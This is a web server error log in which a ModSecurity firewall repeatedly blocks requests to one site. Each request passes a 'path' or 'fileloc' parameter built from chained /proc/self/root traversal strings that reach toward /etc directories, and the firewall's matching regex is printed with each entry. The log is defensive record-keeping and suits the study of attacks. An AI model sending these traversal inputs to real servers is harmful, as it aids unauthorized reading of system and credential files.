[Fri Mar 20 03:57:43.064966 2026] [:error] [pid 15826:tid 140411641214720] [client 74.7.243.128:37924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv5-oXxyEfFpUF8f9VswAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:57:43.602145 2026] [mime_magic:error] [pid 15826:tid 140411725141760] (70014)End of file found: [client 57.141.18.44:41200] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:57:44.387879 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.243.128:58774] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv6DJ3M9BSuKP7CAbibQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:57:47.027525 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:58784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv69a6ubjKNq_cu4ag9AAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:57:51.462974 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.241.31:60746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv77ninkcc-iUj5AovnQAAA4w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:58:06.323178 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.241.31:47100] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzv_l1pVZ5mVmJwsFMDUgAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:58:28.419585 2026] [:error] [pid 11642:tid 140411741927168] [client 74.7.241.31:50530] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwFLninkcc-iUj5AovuwAAA4A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:58:34.774042 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:54392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwGgF0L0L-SsrnPo46gQAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:58:39.800726 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.241.31:54396] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwH_HIg5MgXLBnicPOCAAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:58:46.608340 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:42770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwJvqxLDW4GITHUkS0OgAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:58:50.764416 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:58794] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwKuoXxyEfFpUF8f9WAAAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:58:54.204036 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.243.128:57942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwLjJ3M9BSuKP7CAbipAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:58:56.601038 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.243.128:57954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwMPHIg5MgXLBnicPOEAAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:00.534171 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.243.128:57966] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwNPqxLDW4GITHUkS0QwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:59:04.067804 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:42648] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwOBCii7xarUs8iHY2yQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:06.773870 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:40354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwOuoXxyEfFpUF8f9WGQAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:59:12.495754 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.243.128:40370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwQLninkcc-iUj5Aov1AAAA5g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:18.376139 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:52936] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwRvXLqtnMIWvjpaJrjgAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:20.579098 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:46242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwRxCii7xarUs8iHY20QAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:22.392933 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.243.128:46246] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwShCii7xarUs8iHY21QAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:23.759070 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:46248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwS_XLqtnMIWvjpaJrkQAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:25.045648 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:46260] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwTda6ubjKNq_cu4ahOAAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:25.157816 2026] [:error] [pid 15826:tid 140411716749056] [client 74.7.241.31:48296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] 